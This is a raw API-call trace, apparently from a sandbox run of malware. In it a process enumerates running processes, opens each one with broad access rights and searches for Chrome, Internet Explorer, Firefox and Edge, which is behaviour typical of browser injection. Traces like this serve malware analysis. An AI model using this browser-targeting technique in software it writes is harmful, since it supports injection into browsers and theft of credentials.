	[0216.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0216.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4984
	[0216.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.752] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0216.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.752] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.752] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0216.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.753] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0216.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4988
	[0216.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.754] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0216.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.754] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.755] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0216.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.755] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0216.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x498c
	[0216.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.756] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0216.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.756] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.757] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0216.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.758] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.758] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0216.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4990
	[0216.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.759] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0216.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.759] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.759] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0216.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.760] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.760] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0216.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4994
	[0216.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.761] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0216.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.761] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.761] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0216.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.762] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.762] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0216.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4998
	[0216.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.763] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0216.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.764] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.764] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0216.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.764] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0216.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x499c
	[0216.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.766] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0216.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.766] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.766] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0216.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.766] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.767] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0216.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x49a0
	[0216.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.767] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0216.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.768] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.768] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0216.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.768] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.768] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0216.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x49a4
	[0216.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.769] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0216.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.770] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.770] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0216.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.771] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.771] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0216.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x49a8
	[0216.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.772] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0216.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.772] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.773] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0216.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.774] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.774] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0216.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x49ac
	[0216.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.775] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0216.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.775] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.776] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0216.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.777] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.777] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0216.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x49b0
	[0216.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.779] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0216.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.780] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.780] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0216.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.781] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0216.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x49b4
	[0216.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.782] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0216.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.783] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.783] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0216.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.784] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.784] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x49b8
	[0216.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.786] NtQueryInformationProcess (in: ProcessHandle=0x49b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.786] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.786] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x49bc
	[0216.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.787] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.788] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.788] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.788] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.788] NtQueryInformationProcess (in: ProcessHandle=0x49bc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.788] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x49c0
	[0216.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.789] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.790] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.790] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.790] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0216.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x49c4
	[0216.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.791] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0216.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.792] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.792] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0216.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.792] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x49c8
	[0216.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.793] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.794] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.794] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.794] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x49cc
	[0216.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.796] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.796] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.797] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.797] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0216.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x49d0
	[0216.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.798] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.798] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.799] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.799] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x49d4
	[0216.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.800] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.800] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.801] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.801] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0216.802] CloseHandle (hObject=0x188) returned 1
	[0216.802] Sleep (dwMilliseconds=0x64) 
	[0216.904] GetCurrentProcessId () returned 0x110
	[0216.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0216.907] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0216.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0216.909] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0216.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x49d8
	[0216.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.910] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.911] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.911] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.912] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.912] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x49dc
	[0216.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.913] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.913] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.913] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
